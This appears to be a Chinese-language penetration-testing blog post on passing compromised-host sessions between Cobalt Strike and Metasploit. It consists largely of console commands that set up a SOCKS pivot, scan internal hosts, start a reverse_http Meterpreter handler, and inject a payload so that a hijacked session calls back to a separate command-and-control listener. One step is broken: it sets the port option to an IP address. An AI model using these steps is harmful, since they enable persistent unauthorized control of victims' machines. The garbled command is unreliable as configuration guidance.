Cobaltstrike與MSF會話派生

前言

一般在滲透的過程中,Get到shell之后一般來說我喜歡上線到Cobaltstrike,但是Cobaltstrike的會話是60S更新一次，有時候功能也並沒有MSF完善(我的插件不夠厲害哈哈),那么今天我准備記錄一下如何實現Cobaltstrike與MSF的聯動,並且在下面幾篇文章里，我准備着重講一下隧道技術,尤其是SSH隧道技術、SOCK4隧道技術、SOCK5隧道技術。

正文

Cobastrike搭建SockS隧道

首先Cobaltstrike獲取一個會話,然后搭建SockS。

然后再view里找到Proxy Pivots,點擊Tunnel查看代理設置。

打開Metasploit,設置Socks代理

msf6 > setg Proxies socks4:192.168.37.129:8265 //設置走Cobaltstrike的代理通道
Proxies => socks4:192.168.37.129:8265			
msf6 >  setg ReverseAllowProxy true				//設置允許雙向通道
ReverseAllowProxy => true
msf6 > use auxiliary/scanner/ip/ipidseq  		//設置尋找空閑主機
msf6 auxiliary(scanner/ip/ipidseq) > show options
msf6 auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.37.128-135
RHOSTS => 192.168.37.128-135
msf6 auxiliary(scanner/ip/ipidseq) > run

發現成功掃描到空閑主機：

Cobaltstrike派生會話

當Cobaltstrike獲取到上線主機后,有時候需要傳遞會話到MSF,操作如下:

首先建立新的Foreign HTTP監聽器,設置IP為MSF接收的IP,設置Port是一會兒MSF監聽的端口

然后打開MSF,設置好監聽器:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.37.134
lhost => 192.168.37.134
msf6 exploit(multi/handler) > set lport 8088
lport => 8088
msf6 exploit(multi/handler) > run -j

然后打開Cobaltstrike，轉發會話，方法如下，在會話欄里選擇spawn,選擇payload為剛才設置的MSFpayload,選擇Choose后Metasploit接收到會話。

Metasploit派生會話

如果Metasploit已經獲取到了一個會話，可以通過payload_inject模塊進行會話派生,將會話傳遞到Cobaltstrike。

這里我嘗試先用MSF進行流量加密，再進行會話派生，具體可參照博客:https://www.cnblogs.com/culin/#/c/subject/p/15119863.html。

操作如下,首先Cobaltstrike建立新Becon HTTP的監聽器,設置好監聽的IP和Port

然后獲取到MSF的會話后，需要調用payload_inject模塊，方法如下

msf6> use exploit/windows/local/payload_inject 
msf6> set payload windows/meterpreter/reverse_http  //注意payload的匹配
msf6> set session 2					//需要轉發會話的SESSION
msf6> set lhost 192.168.34.129		//設置需要轉發的IP
msf6> set lport 192.168.34.129 		//設置需要轉發的port
msf6> run							//開始轉發

可以成功看到會話就轉發成功了：

此時Cobaltstrike的會話也會被加密，更加的安全一。